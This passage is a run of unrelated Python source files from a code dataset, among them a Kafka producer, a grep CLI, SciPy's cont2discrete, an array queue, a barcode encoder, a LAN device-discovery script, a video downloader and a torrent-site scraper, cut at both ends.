float(row['longitude'])\n data_point['confidence'] = float(row['confidence'])\n data_point['surface_temperature_celcius'] = float(\n row['surface_temperature_celcius'])\n\n streaming_data.append(data_point)\n\n return streaming_data\n\n\ndef publish_message(producer_instance, topic_name, data):\n try:\n value_bytes = bytes(data, encoding='utf-8')\n producer_instance.send(topic_name, value=value_bytes)\n producer_instance.flush()\n print('Message published successfully. 
Data: ' + str(data))\n    except Exception as ex:\n        print('Exception in publishing message.')\n        print(str(ex))\n\n\ndef connect_kafka_producer():\n    _producer = None\n    try:\n        _producer = KafkaProducer(\n            bootstrap_servers=['localhost:9092'], api_version=(0, 10))\n    except Exception as ex:\n        print('Exception while connecting Kafka.')\n        print(str(ex))\n    finally:\n        return _producer\n\n\nif __name__ == '__main__':\n\n    data = readCSV()\n    topic = 'Hotspot_TERRA'\n    producer = connect_kafka_producer()\n    created_date = dt.datetime(2019, 1, 1)\n\n    count = 0\n\n    while True:\n        count += 4\n\n        random_number = random.randrange(0, len(data))\n        selected_data = data[random_number]\n\n        if count > 16:\n            created_date += dt.timedelta(days=1)\n            created_date.replace(hour=0, minute=0, second=0)\n            count = 0\n\n        selected_data['created_time'] = created_date + dt.timedelta(\n            hours=(random.randrange(count - 4, count)),\n            minutes=(random.randrange(0, 60)),\n            seconds=(random.randrange(0, 60)))\n        # print(selected_data['created_time'].strftime(\"%m/%d/%Y, %H:%M:%S\"))\n        selected_data['producer_id'] = 'producer_hotspot_terra'\n\n        transport_data = str(selected_data)\n        publish_message(producer, topic, transport_data)\n\n        sleep(2)\n","sub_path":"test_environments/terra_producer.py","file_name":"terra_producer.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"401297530","text":"import click\nimport shlex\nimport subprocess\nfrom pathlib import Path\n\n@click.command()\n@click.option('--input', '-i', default='ls -a',\n              help=\"Type a Linux shell command,\\n\"\n                   \"A command with multiple parameters should be in quotation marks, example: 'ls -a'\")\n@click.option('--grep', '-g', default='.',\n              help=\"Type any key word you want to find,\\n\"\n                   \"A multi-word string should be in quotation marks, example: 'find me'\")\ndef cli(input, grep):\n    if input == 'history':\n        home = str(Path.home())\n        with open(home + '/.bash_history', 'r') as file:\n            output = file.read()\n        print_match_lines(output, grep)\n    else:\n        try:\n            input = shlex.split(input)\n            output = subprocess.check_output(input).decode('ascii')\n            print_match_lines(output, grep)\n        except:\n            # This will catch any exception and then execute this print statement\n            print(\"Error: Could not find file or read data\")\n\ndef print_match_lines(pss_output, pss_grep):\n    pss_output = iter(pss_output.splitlines())\n    for i in pss_output:\n        if greps(i, pss_grep) != None:\n            print(greps(i, pss_grep))\n\ndef greps(word, find):\n    for x in range(len(word) - len(find) + 1):\n        if find[0] == word[x]:\n            for i in range(len(find)):\n                if find[i] != word[x + i]:\n                    break\n            else:\n                if i + 1 == len(find):\n                    # word = word.replace(word[x + i - len(find) + 1:x + i + 1], word[x + i - len(find) + 1:x + i + 1].upper())\n                    red = lambda text: '\\033[0;31m' + text + '\\033[0m'\n                    word = word.replace(word[x + i - len(find) + 1:x + i + 1], red(word[x + i - len(find) + 1:x + i + 1]))\n                    return word\n","sub_path":"home-assignments/grep_click/grep_click.py","file_name":"grep_click.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"372153296","text":"import MapReduce\nimport json\nimport sys\n\nmr = MapReduce.MapReduce()\n\n# Map function\n# mr - MapReduce object\n# data - json object formatted as a string\ndef mapper(dataArr):\n\t#data = json.loads(datajson, encoding='latin-1') #in case data is whole document\n\t\n\t#for docid in data: 
#when data is dict type\n\t\t#words = data[docid] #when value is already an array\n\t\t#words = data[docid].split()\n\t\n\t\n\t#for item in dataArr: #when data is list of [docid, text]\n\t\t#docid = item[0]\n\t\t#words = item[1].split()\n\t\n\tdocid = dataArr[0]\n\twords = dataArr[1].split()\n\n\t# output (key, value) pair (only for mapper)\n\tfor key in words: \n\t\tmr.emit_intermediate(key, docid)\n\n\t\t\n# Reduce function\n# mr - MapReduce object\n# key - key generated from map phase, associated to list_of_values\n# list_of_values - values generated from map phase, associated to key\ndef reducer(key, list_of_values):\n\n    # output item (only for reducer)\n    mr.emit([key, list_of_values])\n\ndef main():\n    # Assumes first argument is a file of json objects formatted as strings, \n    #one per line.\n    mr.execute(open(sys.argv[1]), mapper, reducer)\n\nif __name__ == '__main__':\n    main()\n","sub_path":"howe/assignment3/inverted_index.py","file_name":"inverted_index.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"392265610","text":"def multiplicativeInverse(a,b):\n\tu,s = 1,0\n\twhile(b>0):\n\t\tq,a,b = int((a-a%b)/b),b,a%b\n\t\tu,s = s,int(u-(q*s))\n\treturn u\n\ndef add(x1,x2,y1,y2,p):\n\tinv = multiplicativeInverse((x2-x1),p)\n\ts = ((y2-y1)*inv)%p\n\tx3 = ((s*s)-x1-x2)%p\n\ty3 = (s*(x1-x3)-y1)%p\n\treturn x3,y3\n\ndef double(x,y,a,p):\n\tinv = multiplicativeInverse((2*y),p)\n\ts = ((3*x*x + a)*inv)%p\n\tx3 = ((s*s)-2*x)%p\n\ty3 = (s*(x-x3)-y)%p\n\treturn x3,y3\n\ndef multiply(d,x,y,a,p):\n\txr,yr = x,y\n\tbinExp=bin(d)[3:]\n\tfor i in binExp:\n\t\txr,yr = double(xr,yr,a,p)\n\t\tif(i==\"1\"):\n\t\t\txr,yr = add(x,xr,y,yr,p)\n\treturn xr,yr\n\ndef STR(a):\n\tresult = \"\"\n\ta = str(a)\n\tfor i in range(0,len(a)-1,2):\n\t\tresult += chr(int(a[i:i+2]))\n\tprint(result)\nd = 87441340171043308346177\na = 0\nn = 928669833265826932708591\nx = 236857987845294655469221\ny = 12418605208975891779391\nxr,yr = multiply(d,x,y,a,n)\nprint(STR(xr))\nprint(STR(yr))","sub_path":"02_ciphers/04_ellipticCurve/Python/ecc.py","file_name":"ecc.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"481429323","text":"# Given a linked list, determine whether the linked list contains a cycle. \n# \n# To represent a cycle in the given linked list, we use an integer pos to denote the position in the list (0-indexed) that the tail connects to. If pos is -1, there is no cycle in the linked list. \n# \n# Example 1: \n# Input: head = [3,2,0,-4], pos = 1\n# Output: true\n# Explanation: there is a cycle in the linked list, whose tail connects to the second node.\n# \n# Example 2: \n# Input: head = [1,2], pos = 0\n# Output: true\n# Explanation: there is a cycle in the linked list, whose tail connects to the first node.\n# \n# Example 3: \n# Input: head = [1], pos = -1\n# Output: false\n# Explanation: there is no cycle in the linked list.\n# \n# Follow-up: \n# Can you solve it using O(1) (i.e. constant) memory? \n# Related Topics: linked list, two pointers \n# 👍 702 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\nclass Solution:\n    def hasCycleHash(self, head: ListNode) -> bool:\n        \"\"\"\n        Hash-table approach.\n        Time complexity O(n), space complexity O(n).\n        The table stores node references rather than values: nodes with the same head.val may still be different nodes.\n        \"\"\"\n        tmp = []\n        while head:\n            if head in tmp:\n                return True\n            tmp.append(head)\n            head = head.next\n        return False\n\n    def hasCycle(self, head: ListNode) -> bool:\n        \"\"\"\n        Fast/slow two-pointer approach: the fast pointer moves 2 steps per iteration, the slow pointer 1. Seen from the slow pointer, it stands still while the fast pointer gains 1 step per iteration.\n        Time complexity O(n), space complexity O(1).\n        \"\"\"\n        i, j = head, head\n        while i and j and i.next:\n            i = i.next.next\n            j = j.next\n            if i == j:\n                return True\n        return False\n\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"Week_01/day3_[141]环形链表.py","file_name":"day3_[141]环形链表.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"127304782","text":"\"\"\"\nContinuous to discrete transformations for state-space and transfer function.\n\"\"\"\nfrom __future__ import division, print_function, absolute_import\n\n# Author: Jeffrey Armstrong \n# March 29, 2011\n\nimport numpy as np\nfrom scipy import linalg\n\nfrom .ltisys import tf2ss, ss2tf, zpk2ss, ss2zpk\n\n__all__ = ['cont2discrete']\n\n\ndef cont2discrete(sys, dt, method=\"zoh\", alpha=None):\n    \"\"\"\n    Transform a continuous to a discrete state-space system.\n\n    Parameters\n    ----------\n    sys : a tuple describing the system.\n        The following gives the number of elements in the tuple and\n        the interpretation:\n\n            * 2: (num, den)\n            * 3: (zeros, poles, gain)\n            * 4: (A, B, C, D)\n\n    dt : float\n        The discretization time step.\n    method : {\"gbt\", \"bilinear\", \"euler\", \"backward_diff\", \"zoh\"}\n        Which method to use:\n\n            * gbt: generalized bilinear transformation\n            * bilinear: Tustin's approximation (\"gbt\" with alpha=0.5)\n            * euler: Euler (or forward differencing) method (\"gbt\" with alpha=0)\n            * backward_diff: Backwards differencing (\"gbt\" with alpha=1.0)\n            * zoh: zero-order hold (default)\n\n    alpha : float within [0, 1]\n        The generalized bilinear transformation weighting parameter, which\n        should only be specified with method=\"gbt\", and is ignored otherwise\n\n    Returns\n    -------\n    sysd : tuple containing the discrete system\n        Based on the input type, the output will be of the form\n\n        * (num, den, dt) for transfer function input\n        * (zeros, poles, gain, dt) for zeros-poles-gain input\n        * (A, B, C, D, dt) for state-space system input\n\n    Notes\n    -----\n    By default, the routine uses a Zero-Order Hold (zoh) method to perform\n    the transformation.  Alternatively, a generalized bilinear transformation\n    may be used, which includes the common Tustin's bilinear approximation,\n    an Euler's method technique, or a backwards differencing technique.\n\n    The Zero-Order Hold (zoh) method is based on [1]_, the generalized bilinear\n    approximation is based on [2]_ and [3]_.\n\n    References\n    ----------\n    .. [1] http://en.wikipedia.org/wiki/Discretization#Discretization_of_linear_state_space_models\n\n    .. [2] http://techteach.no/publications/discretetime_signals_systems/discrete.pdf\n\n    .. [3] G. Zhang, X. Chen, and T. Chen, Digital redesign via the generalized\n        bilinear transformation, Int. J. Control, vol. 82, no. 4, pp. 
741-754,\n 2009.\n (http://www.ece.ualberta.ca/~gfzhang/research/ZCC07_preprint.pdf)\n\n \"\"\"\n if len(sys) == 2:\n sysd = cont2discrete(tf2ss(sys[0], sys[1]), dt, method=method,\n alpha=alpha)\n return ss2tf(sysd[0], sysd[1], sysd[2], sysd[3]) + (dt,)\n elif len(sys) == 3:\n sysd = cont2discrete(zpk2ss(sys[0], sys[1], sys[2]), dt, method=method,\n alpha=alpha)\n return ss2zpk(sysd[0], sysd[1], sysd[2], sysd[3]) + (dt,)\n elif len(sys) == 4:\n a, b, c, d = sys\n else:\n raise ValueError(\"First argument must either be a tuple of 2 (tf), \"\n \"3 (zpk), or 4 (ss) arrays.\")\n\n if method == 'gbt':\n if alpha is None:\n raise ValueError(\"Alpha parameter must be specified for the \"\n \"generalized bilinear transform (gbt) method\")\n elif alpha < 0 or alpha > 1:\n raise ValueError(\"Alpha parameter must be within the interval \"\n \"[0,1] for the gbt method\")\n\n if method == 'gbt':\n # This parameter is used repeatedly - compute once here\n ima = np.eye(a.shape[0]) - alpha*dt*a\n ad = linalg.solve(ima, np.eye(a.shape[0]) + (1.0-alpha)*dt*a)\n bd = linalg.solve(ima, dt*b)\n\n # Similarly solve for the output equation matrices\n cd = linalg.solve(ima.transpose(), c.transpose())\n cd = cd.transpose()\n dd = d + alpha*np.dot(c, bd)\n\n elif method == 'bilinear' or method == 'tustin':\n return cont2discrete(sys, dt, method=\"gbt\", alpha=0.5)\n\n elif method == 'euler' or method == 'forward_diff':\n return cont2discrete(sys, dt, method=\"gbt\", alpha=0.0)\n\n elif method == 'backward_diff':\n return cont2discrete(sys, dt, method=\"gbt\", alpha=1.0)\n\n elif method == 'zoh':\n # Build an exponential matrix\n em_upper = np.hstack((a, b))\n\n # Need to stack zeros under the a and b matrices\n em_lower = np.hstack((np.zeros((b.shape[1], a.shape[0])),\n np.zeros((b.shape[1], b.shape[1]))))\n\n em = np.vstack((em_upper, em_lower))\n ms = linalg.expm(dt * em)\n\n # Dispose of the lower rows\n ms = ms[:a.shape[0], :]\n\n ad = ms[:, 0:a.shape[1]]\n bd = ms[:, a.shape[1]:]\n\n cd = c\n dd = d\n\n else:\n raise ValueError(\"Unknown transformation method '%s'\" % method)\n\n return ad, bd, cd, dd, dt\n","sub_path":"env/lib/python2.7/site-packages/scipy/signal/cont2discrete.py","file_name":"cont2discrete.py","file_ext":"py","file_size_in_byte":5013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"56414644","text":"class Empty(Exception):\n \"\"\" Error attempting to access element from empty container.\n Note that Empty is a subclass of python's builtin Exception class\"\"\"\n pass\n\nclass ArrayQueue:\n DEFAULT_CAPACITY = 10\n \"\"\" This class implements queue using Python list as an Adapter Pattern.\n\n Methods to implement for realizing Stack.\n i) enqueue(e)\n ii) dequeue()\n\n Accessor methods.\n i) first ~ return top element\n ii) is_empty ~ returns True if the stack is empty.\n iii) len ~ returns length of the Stack.\n\n \"\"\"\n\n def __init__(self):\n self._data = [None] * ArrayQueue.DEFAULT_CAPACITY\n self._size = 0 # Number of elements in the queue\n self._front = 0 # index of the first element that is to be removed\n\n def __len__(self):\n return self._size\n\n def is_empty(self):\n return self._size == 0\n\n def first(self):\n if self.is_empty():\n raise Empty('Queue is empty')\n \n return self._data[self._front]\n\n def dequeue(self):\n if self.is_empty():\n raise Empty('Queue is empty')\n\n answer = self._data[self._front]\n self._data[self._front] = None # help garbage collection\n self._size -= 1\n self._front = (self._front + 1) % 
len(self._data)\n\n return answer\n \n def enqueue(self, e):\n if self._size == len(self._data):\n self._resize( 2*len(self._data))\n\n index = (self._front + self._size) % len(self._data)\n self._data[index] = e\n self._size += 1\n\n def _resize(self, new_capacity):\n B = [None] * new_capacity\n for idx in range(self._size):\n B[idx] = self._data[self._front]\n self._front = (self._front + 1) % len(self._data)\n\n self._data = B\n self._front = 0\n\n \n \nif __name__ == '__main__':\n Q = ArrayQueue()\n Q.enqueue(1)\n Q.enqueue(2)\n Q.enqueue(3)\n Q.enqueue(4)\n Q.enqueue(5)\n Q.enqueue(6)\n Q.enqueue(7)\n Q.enqueue(8)\n Q.enqueue(9)\n Q.enqueue(10)\n print(Q.dequeue( ))\n Q.enqueue(11)\n Q.enqueue(12)\n Q.enqueue(13)\n Q.enqueue(14)\n Q.enqueue(15)\n print(Q.dequeue( ))\n print(Q.dequeue( ))\n Q.enqueue(7)\n Q.enqueue(9)\n print(Q._data)\n print(Q.first())\n Q.enqueue(4)\n print(len(Q))\n print(Q.dequeue( ))\n","sub_path":"Chapter#06/Queue.py","file_name":"Queue.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"628195632","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# date: 2018/2/14\n# author: he.zhiming\n#\n\nfrom __future__ import unicode_literals, absolute_import\n\nimport subprocess\n\nfrom py3utils._exceptions import CommandRunFailedException\n\nfrom py3utils._unicode import UnicodeUtils\n\n\nclass CommandRunner:\n def __init__(self):\n \"\"\"\n\n Usage:\n CommandRunner().run(some_cmd_str)\n\n :return:\n \"\"\"\n self._cmd_str = None\n\n self._p = None\n self._stdout = None\n self._stderr = None\n\n def run(self, cmd_str: str, *, use_pipe=True):\n \"\"\"运行命令\n\n 不返回 stdout 的内容给调用方\n\n :param cmd_str:\n :return:\n \"\"\"\n self._cmd_str = cmd_str\n\n if use_pipe:\n self._p = subprocess.Popen(self._cmd_str, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n else:\n self._p = subprocess.Popen(self._cmd_str, shell=True)\n\n (self._stdout, self._stderr) = self._p.communicate()\n\n if self._p.returncode != 0:\n raise CommandRunFailedException('run command failed(%s). reason: %s' % (\n self._cmd_str, UnicodeUtils.get_str(self._stderr)))\n else:\n return UnicodeUtils.get_str(self._stdout)\n","sub_path":"py3utils/_command.py","file_name":"_command.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"605313973","text":"#! usr/bin/env python3\n\n\"\"\"\n Module 2 Task 1\n barcode.py\n\"\"\"\n\nfrom __future__ import print_function\n\ndef printBarCode(zipCode):\n \"\"\"\n This function will convert the zip code to bar code format.\n 1. Incodes zipcode to bar format\n 2. Validates user input if it is match the format of US zip code.\n 3. Parses the numbers.\n 4. Calculates the check digit for the barcode\n 5. 
    Args:\n        zipCode: string of zip code to be validated and parsed.\n    Returns:\n        0 if zip code is valid.\n        1 if zip code is not valid.\n    \"\"\"\n\n    # Declare and initialize the vertical bar string that frames the barcode.\n    pipe = \"|\"\n    # total adds up all the zip code digits (renamed from sum so the built-in is not shadowed).\n    total = 0\n    # Check if the zip code is only numbers.\n    if not zipCode.isdigit():\n        print(\"Error: Zip code is not all numeric\")\n        return 1\n    # Check that the zip code is exactly five digits long.\n    elif len(zipCode) != 5:\n        print(\"Error: Zip code is not 5 digits\")\n        return 1\n    # Loop over each digit in the zip code and encode it.\n    for el in zipCode:\n        pipe += printDigit(int(el))\n        total += int(el)\n    # Check whether the digit total leaves a remainder when divided by 10.\n    if total%10 > 0:\n        # If so, the check digit is 10 minus that remainder.\n        checkDigit = 10 - (total%10)\n    else:\n        # If not, the check digit is 0.\n        checkDigit = 0\n    # Append the encoded check digit and the closing frame bar.\n    pipe += printDigit(checkDigit)\n    pipe += \"|\"\n    print(pipe)\n    return 0\n\n\ndef printDigit(d):\n    \"\"\"\n    This function converts a digit into barcode format and returns the result.\n    Args:\n        d: digit passed in from the printBarCode function to be encoded.\n    Returns:\n        barcode: The string representing the barcode of the digit.\n    \"\"\"\n    # Declares and initializes the barcode variable.\n    barcode = \"\"\n    # Tracks how many full bars have been drawn so far.\n    position = 0\n    # Digit 0 is encoded with the value 11 (two full bars, then half bars).\n    if d == 0:\n        d = 11\n    # Check if the digit is greater than or equal to 7\n    if d >= 7:\n        # Draw full bar\n        barcode += \"|\"\n        d -= 7\n        position += 1\n    else:\n        # Draw half bar\n        barcode += \":\"\n    # Check if the digit is greater than or equal to 4\n    if d >= 4:\n        # Draw full bar\n        barcode += \"|\"\n        d -= 4\n        position += 1\n    else:\n        # Draw half bar\n        barcode += \":\"\n    # Check if the digit is greater than or equal to 2\n    if d >= 2:\n        # Draw full bar\n        barcode += \"|\"\n        d -= 2\n        position += 1\n    else:\n        # Draw half bar\n        barcode += \":\"\n    # Check if the digit is greater than or equal to 1\n    if d >= 1:\n        # Draw full bar\n        barcode += \"|\"\n        d -= 1\n        position += 1\n    else:\n        # Draw half bar\n        barcode += \":\"\n    # If exactly one full bar has been drawn, the final parity bar is full.\n    if position == 1:\n        # Draw full bar\n        barcode += \"|\"\n    else:\n        # Draw half bar\n        barcode += \":\"\n\n    # Return barcode\n    return barcode\n\n\ndef main():\n    \"\"\"\n    Run the python app.\n    1. Prompt the user to enter a zipcode.\n    2. Invoke printBarCode function.\n    3. 
Pass the user input to the printBarCode function.\n \"\"\"\n #Ask the user for a zip code.\n zipCode = input(\"Enter a zipcode: \")\n # Invoke printBarCode function and makes user input as an argument.\n printBarCode(zipCode)\n\n\nif __name__ == \"__main__\":\n main()\n exit(0)\n","sub_path":"barcode.py","file_name":"barcode.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"525263516","text":"\"\"\"Mobile Alerts device discovery.\"\"\"\nimport socket\nfrom datetime import timedelta\nimport logging\nimport struct\n\n\nDISCOVERY_PORT = 8003\nDISCOVERY_ADDRESS = ''\nDISCOVERY_PAYLOAD = b\"\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0a\"\nDISCOVERY_TIMEOUT = timedelta(seconds=2)\n\n\nclass MobileAlerts:\n \"\"\"Base class to discover Mobile Alerts gateways.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the Mobile Alerts discovery.\"\"\"\n self.entries = [] # type: List[Tuple[str]]\n\n def scan(self):\n \"\"\"Scan the network.\"\"\"\n self.update()\n\n def all(self):\n \"\"\"Scan and return all found entries.\"\"\"\n self.scan()\n return self.entries\n\n def update(self):\n \"\"\"Scan network for Mobile Alerts gateways.\"\"\"\n entries = []\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.settimeout(DISCOVERY_TIMEOUT.seconds)\n sock.sendto(DISCOVERY_PAYLOAD, (DISCOVERY_ADDRESS, DISCOVERY_PORT))\n\n while True:\n try:\n data, (address, _) = sock.recvfrom(1024)\n if len(data) != 0xba:\n continue\n type,gatewayID0,gatewayID1,gatewayID2,gatewayID3,gatewayID4,gatewayID5,length = struct.unpack('>H6BH', data[:2+6+2])\n if type != 3 or length != 0xba:\n continue\n deviceName = str(data[28:48], 'utf-8').rstrip('\\x00')\n entry = [('%02x'*6) % (gatewayID0,gatewayID1,gatewayID2,gatewayID3,gatewayID4,gatewayID5),deviceName]\n entry.insert(0, address)\n entries.append(tuple(entry))\n\n except socket.timeout:\n break\n except UnicodeDecodeError:\n # Catch invalid responses\n logging.getLogger(__name__).debug(\n 'Ignoring invalid unicode response from %s', address)\n continue\n\n self.entries = entries\n\n sock.close()\n\n\ndef main():\n \"\"\"Test Mobile Alerts discovery.\"\"\"\n from pprint import pprint\n mobilealerts = MobileAlerts()\n pprint(\"Scanning for Mobile Alerts gateways..\")\n mobilealerts.update()\n pprint(mobilealerts.entries)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"netdisco/mobilealerts.py","file_name":"mobilealerts.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"573358169","text":"import numpy as np\nfrom scipy import polyval, polyfit\nfrom matplotlib import pyplot as plt\n#from operator import mul\nfrom fastar import *\n\n# Assume a 2nd degree polynomial with coefficients a, b, c: y(x) = ax^2 + bx + c\na, b, c = polyfit(givenTemp, givenMAC, 2)\ny_val_lineMAC = polyval([a, b, c], givenTemp) # predicted values of y\nx_val_lineTemp = np.linspace(20.0, 80.0, 20)\ny_val_lineMAC = polyval([a, b, c], x_val_lineTemp)\n\n# Here we add the temperature values we want to find MAC for \nnewTemp = [25.0,35.0,45.0,55.0,65.0,75.0,80.0]\nnewMAC = polyval([a, b, c], newTemp)\nallTemps = sorted(givenTemp+newTemp)\nallMACS= sorted((givenMAC+newMAC.tolist()),reverse=True) \n\nwriteFile = open('TempvsMAC.txt','w')\naRow = \"T [°C]\\tMAC 
[m^2/mol]\\n\"\nfor k in range(len(allTemps)):\n\twriteFile.write(aRow)\n\taRow = \"%.1f\\t%.1f\\n\" % (allTemps[k], allMACS[k])\n\nwriteFile.write(aRow)\t\nwriteFile.close()\n\n# Create plots\nfig = plt.figure()\nax1 = fig.add_subplot(111)\nax1.plot(x_val_lineTemp, y_val_lineMAC, 'b-',givenTemp,givenMAC,'ro',newTemp,newMAC,'ko')\nplt.xlabel(r'$T$ [K]', fontsize=18)\nplt.ylabel(r'$\\varepsilon$ [m$^2/$mol] ', fontsize=16)\nplt.legend([\"Best fit line\",\"Referenced values\",\"Extrapolated values\"])\nplt.grid(True)\nplt.show()\n","sub_path":"Enthalpy of Iodine sublimation/src/extrapolate.py","file_name":"extrapolate.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"647636236","text":"from time import strftime\nfrom time import sleep\nfrom urllib.request import urlopen\n\ndef openUrlAndLog(site):\n response = urlopen(site)\n curTime = strftime(\"%Y-%m-%d %H:%M:%S\")\n print(str(curTime)+': '+str(response.status)+' '+response.geturl())\n\ndef hitSites(sites):\n for site in sites:\n if site[0] != '#':\n openUrlAndLog(site)\n \ndef runDaemon(sites):\n while 1:\n hitSites(sites)\n sleep(3540) #number of seconds in 59 minutes\n\nhitlist = open('hitlist.txt')\nsites = ['http://' + site.strip() for site in hitlist]\nhitlist.close()\nrunDaemon(sites)\n","sub_path":"KeepAlive.py","file_name":"KeepAlive.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"147069922","text":"from flask import Flask,request\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/api',methods=['GET'])\r\n\r\ndef index():\r\n Query = str(request.args['Query'])\r\n word=Query+\" \"\r\n lst = []\r\n st=\"\"\r\n for let in word:\r\n if(let==\" \"):\r\n lst.append(st)\r\n st=\"\"\r\n else:\r\n st = st + let\r\n print(lst)\r\n return Query\r\n\r\nif __name__ == '__main__':\r\n app.run()","sub_path":"API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"180042422","text":"#!/usr/bin/env python\n\n__all__ = ['xtube_download', 'xtube_download_by_id']\n\nfrom ..common import *\n\nimport urllib\n\ndef xtube_download_by_id(id, title = None, output_dir = '.', merge = True, info_only = False):\n html = get_html('http://www.xtube.com/find_video.php?video_id=%s' % id)\n url = urllib.parse.unquote(r1('&filename=([a-zA-Z0-9\\-\\%\\.\\\\_]+)', html))\n title = \"[%s] %s\" % (id, title)\n type, ext, size = url_info(url)\n print_info(site_info, title, type, size)\n if not info_only:\n download_urls([url], title, ext, size, output_dir, merge = merge)\n\ndef xtube_download(url, output_dir = '.', merge = True, info_only = False):\n html = get_html(url)\n title = r1(r'(.*)', html)\n assert title\n id = r1(r'http://www.xtube.com/watch.php\\?v=([a-zA-Z0-9\\-]+)', url)\n assert id\n xtube_download_by_id(id, title, output_dir = output_dir, merge = merge, info_only = info_only)\n \nsite_info = \"xtube.com\"\ndownload = xtube_download\ndownload_playlist = playlist_not_supported('xtube')\n","sub_path":"src/you_get/downloader/xtube.py","file_name":"xtube.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"486885193","text":"from bs4 import BeautifulSoup\nimport requests\nimport os\nfrom download import Download\nimport sys\n\nclass Tdownloader:\n def 
__init__(self, title):\n self.title = title.replace(' ', '+')\n self.pg = 1\n\n def get_title(self):\n return self.title\n\n def Contents(self, url):\n headers = {\n 'user-Agent': 'Mozilla/5.0'\n }\n with requests.get(url, headers=headers) as data:\n contents = BeautifulSoup(data.content, \"html.parser\")\n return contents\n\n def Informations(self, page=1):\n \"\"\"\n Get information from https://1337x.to/\n \"\"\"\n numbers_list = []\n urls_list = []\n names_list = []\n seeds_list = []\n leeches_list = []\n sizes_list = []\n informations = []\n\n contents = self.Contents(f\"https://1337x.to/search/{self.title}/{page}/\")\n urls = contents.findAll(\"td\", \"name\")\n names = contents.findAll(\"td\", \"name\")\n seeds = contents.findAll(\"td\", \"seeds\")\n leeches = contents.findAll(\"td\", \"leeches\")\n sizes = contents.findAll(\"td\", \"size\")\n\n [numbers_list.append(count) for count in range(1, len(names))]\n [names_list.append(name.a.next_sibling.text.strip(' ⭐'))\n for name in names]\n [seeds_list.append(seed.text) for seed in seeds]\n [leeches_list.append(leech.text) for leech in leeches]\n [sizes_list.append(size(text=True, recursive=False)[0])\n for size in sizes]\n [urls_list.append(url.a.next_sibling[\"href\"]) for url in urls]\n\n [informations.append(info) for info in zip(\n numbers_list, names_list, seeds_list, leeches_list, sizes_list, urls_list)]\n\n return informations\n\n def ShowInfo(self, page=1):\n BOLD = '\\033[1m'\n CGREY = '\\33[90m'\n OKBLUE = '\\033[94m'\n WARNING = '\\033[93m'\n GREEN = '\\33[32m'\n RED = '\\033[91m'\n ENDC = '\\033[0m'\n\n print(f\"\\n{WARNING}NUMBER{ENDC}\\t\\t{BOLD}NAME{ENDC}\\t\\t{GREEN}SEEDS{ENDC}\\t\\t{RED}LEECHES{ENDC}\\t\\t{OKBLUE}SIZE{ENDC}\")\n print(f'{CGREY}={ENDC}' * 90)\n\n for i in self.Informations(page=page):\n print(\n f\"{WARNING}{i[0]}{ENDC} | {BOLD}{i[1]}{ENDC} |{GREEN}{i[2]}{ENDC} | {RED}{i[3]}{ENDC} |{OKBLUE}{i[4]}{ENDC}\",\n end='\\n{}{}{}\\n'.format(CGREY, '=' * 90, ENDC)\n )\n print(f\"{BOLD} PAGE {page} {ENDC}\\n\")\n\n def GetPath(self):\n path = os.path.abspath(__file__)\n base_dir = os.path.dirname(path)\n download_path = os.path.join(base_dir, 'downloads')\n os.makedirs(download_path, exist_ok=True)\n return download_path\n\n def next_page(self):\n os.system(\"clear\")\n self.pg += 1\n self.ShowInfo(self.pg)\n self.select_page()\n return self.pg\n\n def prev_page(self):\n os.system(\"clear\")\n self.pg -= 1\n self.ShowInfo(self.pg)\n self.select_page()\n return self.pg\n\n def select_page(self):\n ch = input(\"[?] 'next' for next page\\n[?] 'prev' for previous page\\n[?] 'ok' stay right page: \")\n \n if ch == str(\"next\"):\n mpage = self.next_page()\n elif ch == str(\"prev\"):\n if self.pg == 1:\n raise TypeError(\"this page is 1 .. not previous page exist !!!!!\")\n mpage = self.prev_page()\n elif ch == str(\"ok\"):\n mpage = self.pg\n else:\n raise TypeError(\"bad choice\")\n\n def 